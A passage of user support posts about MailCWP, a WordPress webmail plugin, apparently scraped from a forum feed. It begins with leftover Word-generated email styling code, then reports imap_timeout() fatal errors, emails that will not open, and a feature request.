margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:”Times New Roman”;
mso-fareast-language:EN-US;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
mso-style-priority:99;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
text-decoration:underline;
text-underline:single;}
span.EmailStyle17
{mso-style-type:personal-compose;
mso-style-noshow:yes;
mso-style-unhide:no;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:”Times New Roman”;
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:”Times New Roman”;
mso-fareast-language:EN-US;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
–></style><!–[if gte mso 10]><style>/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:””;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-fareast-language:EN-US;}
</style><![endif]–><!–[if gte mso 9]><xml>
<o:shapedefaults v:ext=”edit” spidmax=”1026″ ></o:shapedefaults>
</xml><![endif]–><!–[if gte mso 9]><xml>
<o:shapelayout v:ext=”edit”>
<o:idmap v:ext=”edit” data=”1″ ></o:idmap>
</o:shapelayout></xml><![endif]–></head><body lang=EN-AU link=blue vlink=purple style=’tab-interval:36.0pt’><div class=WordSection1><p class=MsoNormal>Hello I need help on the 6<sup>th</sup> July<o:p></o:p></p></div></body></html>
there is a lot of code there I know. now yes it is easy to select all and cut for 1 email here and there but 50 a day is going to be a nightmare please help
]]>Trying to save the settings i get a fatal error: Fatal error: Call to undefined function imap_timeout() in /www/wordpress/websiteswork771/jazekerbeveiligi/wp-content/plugins/mailcwp/mailcwp.php on line 617
Trying to open a page with the shortcode gives following:Fatal error: Call to undefined function imap_timeout() in /www/wordpress/websiteswork771/jazekerbeveiligi/wp-content/plugins/mailcwp/mailcwp.php on line 2367
]]>Hi!
I got the plugin to work and fetch all my mail, but it won′t open. Nothing happens when I click on a mail. I tried to upgrade to version 1.8 but it didn′t make any difference. Otherwise I like the plugin and it would fill our needs.
Why doesn′t my mail open? I′ve tried using firefox, explorer, chrome etc. No difference.
Best regards
Michael Lindgren
TN Consultant AB
I just installed the plugin and configured it, its working except that some emails when i click on it nothing comes up, while some will open (pop-up).
When i click on the once that will not open, the ajax loading image keeps rotating then stops with out any pop up
]]>It would be a great product if it would work in Buddypress. Please consider adding this functionality.
]]>Just downloaded to try out your MailCWP plugin. It installed OK but on viewing the page with the shortcode, I get this error message.
Fatal error: Call to undefined function imap_timeout() in /media/lamp/www/met.linktosite.info/wp-content/plugins/mailcwp/mailcwp.php on line 2367
A search of your code doesn’t seem tohave a function definition for imap_timeout() in any of the code.
]]>